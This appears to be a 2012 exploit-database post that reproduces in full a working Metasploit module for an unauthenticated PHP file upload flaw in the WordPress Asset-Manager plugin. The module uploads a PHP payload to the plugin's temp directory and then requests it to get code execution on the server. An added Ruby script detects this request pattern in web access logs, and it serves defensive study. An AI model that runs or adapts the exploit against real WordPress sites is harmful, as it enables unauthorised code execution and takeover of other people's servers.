WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and earlier. The plugin allows PHP files to be uploaded: a user can upload a file to a temporary directory without any authentication, which leads to arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body with the single "Filedata" part that upload.php expects
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
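An added detection example, not part of the original post or of the Metasploit module: it scans combined-format web access-log lines for the request sequence the module above produces, an unauthenticated POST to the plugin's upload.php followed by a GET for a .php file under wp-content/uploads/assets/temp/. The log lines, addresses and the function name detect_asset_manager_abuse are constructed for this example.

```ruby
# Added example (not from the original post or the Metasploit module): flag
# access-log entries matching the Asset-Manager upload.php abuse pattern.
# Assumes Apache/nginx "combined" log format; sample lines are constructed.
UPLOAD_RE = %r{POST (?<uri>\S*/wp-content/plugins/asset-manager/upload\.php)}
EXEC_RE   = %r{GET (?<uri>\S*/wp-content/uploads/assets/temp/(?<file>[^\s?/]+\.php)\S*)}
LOG_RE    = /^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<req>[^"]*)" (?<status>\d{3}) /

# Returns an array of alert hashes. Any POST to upload.php is reported on its
# own (the endpoint requires no authentication, so every hit deserves review);
# a later GET for a PHP file in the temp directory by the same client is
# reported as a probable execution of an uploaded script.
def detect_asset_manager_abuse(lines)
  alerts = []
  uploaded = Hash.new { |h, k| h[k] = [] }  # ip -> timestamps of upload POSTs
  lines.each do |line|
    m = LOG_RE.match(line) or next
    ip, req, status = m[:ip], m[:req], m[:status].to_i
    if (u = UPLOAD_RE.match(req))
      alerts << { ip: ip, kind: :upload_post, uri: u[:uri], status: status }
      uploaded[ip] << m[:time]
    elsif (e = EXEC_RE.match(req))
      kind = uploaded.key?(ip) ? :upload_then_exec : :temp_php_get
      alerts << { ip: ip, kind: kind, uri: e[:uri], file: e[:file], status: status }
    end
  end
  alerts
end

# Constructed sample log; addresses come from the documentation ranges.
SAMPLE_LOG = <<~LOG
  198.51.100.4 - - [31/Dec/2012:09:10:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:12:44 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:12:45 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzxw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:13:02 +0800] "GET /wordpress/wp-content/uploads/2012/12/photo.jpg HTTP/1.1" 200 8802 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  detect_asset_manager_abuse(SAMPLE_LOG.lines).each { |a| puts a.inspect }
end
```

Ordinary media requests under wp-content/uploads are ignored; only the plugin's upload endpoint and PHP files in its temp directory raise alerts.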